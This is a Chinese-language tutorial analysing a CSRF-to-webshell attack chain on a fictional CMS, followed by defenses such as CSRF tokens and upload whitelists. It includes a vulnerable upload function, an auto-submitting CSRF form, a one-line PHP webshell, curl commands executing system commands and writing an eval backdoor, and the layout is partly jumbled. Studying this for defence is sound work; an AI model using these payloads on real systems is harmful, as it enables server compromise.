# CMS從CSRF到Getshell的示例分析
## 引言
跨站請求偽造(CSRF)和GetShell是Web安全領域中兩個關鍵的攻擊手段。本文將通過一個虛構的CMS(內容管理系統)示例,詳細分析攻擊者如何利用CSRF漏洞逐步獲取服務器Shell權限的全過程。我們將從漏洞原理、利用鏈構造到最終攻擊實現進行完整拆解。
---
## 一、漏洞背景與實驗環境
### 1.1 目標系統簡介
- **CMS版本**:某開源CMS v5.2.3
- **漏洞模塊**:后臺插件上傳功能
- **認證方式**:Cookie+Session認證
### 1.2 前置漏洞
1. **CSRF漏洞**:后臺缺少Token驗證
2. **文件上傳繞過**:未校驗文件類型和內容
3. **路徑遍歷**:上傳路徑可控
```php
// 偽代碼示例:存在漏洞的上傳接口
function uploadPlugin() {
if(isAdmin()) { // 僅檢查管理員登錄狀態
move_uploaded_file($_FILES['plugin']['tmp_name'], $_POST['path']);
}
}
常規CSRF攻擊受限于: - 僅能觸發單一敏感操作(如修改密碼) - 無法直接獲取交互式Shell
graph LR
A[誘導管理員訪問惡意頁面] --> B[CSRF觸發插件上傳]
B --> C[上傳WebShell]
C --> D[連接WebShell獲取權限]
<!-- 惡意頁面csrf.html -->
<form action="http://cms/admin/upload.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="path" value="plugins/evil.php" />
<input type="file" name="plugin" />
<input type="submit" value="Submit" />
</form>
<script>
document.forms[0].submit();
</script>
// evil.php內容
<?php system($_GET['cmd']); ?>
/plugins/evil.phphttp://cms/plugins/evil.php?cmd=id# 攻擊者終端操作示例
curl "http://cms/plugins/evil.php?cmd=whoami"
>> www-data
curl "http://cms/plugins/evil.php?cmd=echo '<?php eval(\$_POST[x]);?>' > shell.php"
// 正確做法:添加CSRF Token
function generateToken() {
return hash('sha256', session_id() . SECRET_KEY);
}
// 在表單中嵌入
<input type="hidden" name="token" value="<?=generateToken()?>">
| 防護措施 | 實現示例 |
|---|---|
| 文件類型白名單 | in_array($ext, ['jpg','png']) |
| 內容檢測 | exif_imagetype()驗證 |
| 隨機文件名 | md5(uniqid()).$ext |
POST /admin/upload.php HTTP/1.1
Host: cms
Cookie: admin_session=xxx
Content-Type: multipart/form-data
------WebKitFormBoundary
Content-Disposition: form-data; name="token"
missing_token_value
------WebKitFormBoundary--
預期結果:返回403狀態碼并拒絕請求
